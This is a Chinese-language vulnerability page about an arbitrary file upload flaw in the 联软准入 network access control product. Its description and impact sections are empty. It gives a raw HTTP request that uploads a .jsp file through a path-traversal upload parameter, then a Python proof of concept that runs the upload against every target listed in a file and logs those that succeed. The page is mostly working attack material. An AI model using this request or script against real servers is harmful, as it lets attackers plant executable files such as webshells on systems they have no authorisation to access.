联软准入_任意文件上传漏洞

# 联软准入 任意文件上传漏洞

=========================

一、漏洞简介
————

二、漏洞影响
————

三、复现过程
————

POST /uai/download/uploadfileToPath.htm HTTP/1.1
Host: www.0-sec.org:8099
User-Agent: python-requests/2.22.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Length: 308
Content-Type: multipart/form-data; boundary=ea8ef2c3b016cd152a651d2799ef2c5c

–ea8ef2c3b016cd152a651d2799ef2c5c
Content-Disposition: form-data; name=”input_localfile”; filename=”111.jsp”
Content-Type: text/plain

aaaaa
–ea8ef2c3b016cd152a651d2799ef2c5c
Content-Disposition: form-data; name=”uploadpath”;

../webapps/notifymsg/devreport/
–ea8ef2c3b016cd152a651d2799ef2c5c–

![1.png](/static/qingy/联软准入_任意文件上传漏洞/img/rId24.png)

上传路径:

`https://www.0-sec.org/notifymsg/devreport/111.jsp`

![2.png](/static/qingy/联软准入_任意文件上传漏洞/img/rId25.png)

### poc

> poc.py

import requests

def main(line):
proxies = {‘http’: ‘http://localhost:8080’}
# url = ‘https://www.0-sec.org/uai/download/uploadfileToPath.htm’
url = line + ‘/uai/download/uploadfileToPath.htm’
url_2 = line.strip() + ‘/notifymsg/devreport/{}’
filename = ‘111.txt’
files = {
‘input_localfile’: (filename, open(filename), ‘text/plain’),
}
content = {
‘uploadpath’: ‘../webapps/notifymsg/devreport/’
}
res = requests.post(url, files=files, proxies=proxies, data=content, verify=False)
# print(res.text)
res_2 = requests.get(url_2.format(filename), verify=False)
if ‘xxx’ in res_2.text:
print(‘ok….’)
with open(‘ok.txt’, mode=’a’) as f:
f.write(url_2.format(filename) + ‘\n’)
print(‘写入成功…’)

if __name__ == ‘__main__’:
with open(‘ip.txt’, mode=’r’) as f:
for line in f.readlines():
if line == ‘\n’:
pass
main(line)

参考链接
——–

> https://blog.csdn.net/m0\_48520508/article/details/108790281

© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享
评论 抢沙发

请登录后发表评论

    请登录后查看评论内容